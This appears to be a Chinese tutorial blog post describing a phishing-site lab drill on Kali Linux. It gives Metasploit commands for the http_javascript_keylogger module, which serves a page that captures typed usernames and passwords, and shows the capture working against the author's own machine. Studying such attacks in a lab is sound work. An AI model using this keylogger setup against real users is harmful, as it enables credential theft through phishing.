Kali与编程:小白黑客带你进行钓鱼网站攻防演练

(以下步骤配合克隆网站才算成功)

用户键盘输入被不法分子监控和记录的套路是怎么样子的?

准备工作

实验环境:kali2019 和win10(我自己的真机)

查看postgresql服务的状态:service postgresql status

若没有打开则输入:service postgresql start 临时开启服务

或者永久开启即:update -rc.d postgresql enable

服务打开后如下面所示

Kali与编程:小白黑客带你进行钓鱼网站攻防演练

Kali:

进入msfconsole框架

Kali与编程:小白黑客带你进行钓鱼网站攻防演练

键盘记录器:被记录下的数据会发送到攻击者指定的URL地址上

search keylogger

使用search keylogger攻击模块:use auxiliary/server/capture/http_javascript_keylogger

Kali与编程:小白黑客带你进行钓鱼网站攻防演练

Kali与编程:小白黑客带你进行钓鱼网站攻防演练

show options查看要设置的内容

Kali与编程:小白黑客带你进行钓鱼网站攻防演练

set demo true

set uipath /

run

生成local ip

Kali与编程:小白黑客带你进行钓鱼网站攻防演练

本机:

将生成IP在浏览器登录(由于我还未克隆网站,所以简陋了一些)

Kali与编程:小白黑客带你进行钓鱼网站攻防演练

随便输入用户名和密码看看能否监控

Kali与编程:小白黑客带你进行钓鱼网站攻防演练

发现kali已经监控成功

Kali与编程:小白黑客带你进行钓鱼网站攻防演练

展开阅读全文

页面更新:2024-04-14

标签:记录器   攻击者   不法分子   网站   套路   攻防   简陋   框架   模块   黑客   步骤   键盘   随便   浏览器   样子   状态   密码   数码

1 2 3 4 5

上滑加载更多 ↓
推荐阅读:
友情链接:
更多:

本站资料均由网友自行发布提供,仅用于学习交流。如有版权问题,请与我联系,QQ:4156828  

© CopyRight 2020-2024 All Rights Reserved. Powered By 71396.com 闽ICP备11008920号-4
闽公网安备35020302034903号

Top